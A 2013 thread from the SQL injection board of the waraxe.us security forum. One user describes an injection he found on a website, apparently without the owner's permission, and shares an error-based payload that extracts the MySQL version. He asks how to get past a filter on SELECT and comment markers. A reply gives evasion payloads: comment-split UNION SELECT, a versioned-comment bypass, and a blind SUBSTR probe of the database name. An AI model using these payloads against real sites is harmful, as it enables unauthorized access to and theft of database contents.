|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 92
Members: 0
Total: 92
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SELECT is filtered? |
|
Posted: Tue May 21, 2013 1:33 am |
|
|
fatman44 |
Beginner |
|
|
Joined: May 21, 2013 |
Posts: 2 |
|
|
|
|
|
|
|
Hello community,
i got a problem. I successfully found a SQLi. With this i got the column number:
"... oder by x".
I also got the mysql-version with this:
"... or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1".
BUT if i want to go further and union select all it doesn't work (standard error page comes up - please contact the admin ...).
I also tried to recieve the dbname. That didn't work either. I guess because both of them contain "select" in it.
The same error-page opens if i but "--" at the end of the "order by" request (without them it works!).
So it seems like there is a filter for "select" and stuff like "--"? is that possible? I mean "select" can't be filtered as this is a common command right?
BTW the websites script ist really lame. It's not a big deal. So i am asking you is there another way of doing "union select"?
greets
EDIT:
pasted "select" into the mysql version query. Response: Wrong syntax. so it doesn't seem to filter it. so i was right with that - lol. Any help guys? |
|
|
|
|
|
|
|
|
Posted: Tue May 21, 2013 11:10 am |
|
|
fatman44 |
Beginner |
|
|
Joined: May 21, 2013 |
Posts: 2 |
|
|
|
|
|
|
|
Push. Union all select isnt answering! Getting a message to contact admin |
|
|
|
|
Posted: Mon Jul 08, 2013 7:38 pm |
|
|
OrionEinfold |
Beginner |
|
|
Joined: Jul 08, 2013 |
Posts: 4 |
|
|
|
|
|
|
|
If the 'SELECT' keyword filtered ..Then it can be avoided by using a lot of techniques, Try this with simple queries ..
Code: | Vuln.php?ID=1/*--*/UNION/*--*/SELECT/*--*/1,2,3.. |
Code: | Vuln.php?ID=1+UNION+/*!SELECT*/+1,2,3.. |
Otherwise, I suggest to use a BLIND method with SUBSTR() function.. It’s kind of sure therefore you don’t have to use SELECT
Code: | 1+AND+SUBSTR(DATABASE(),1,1)=’a’—+ |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|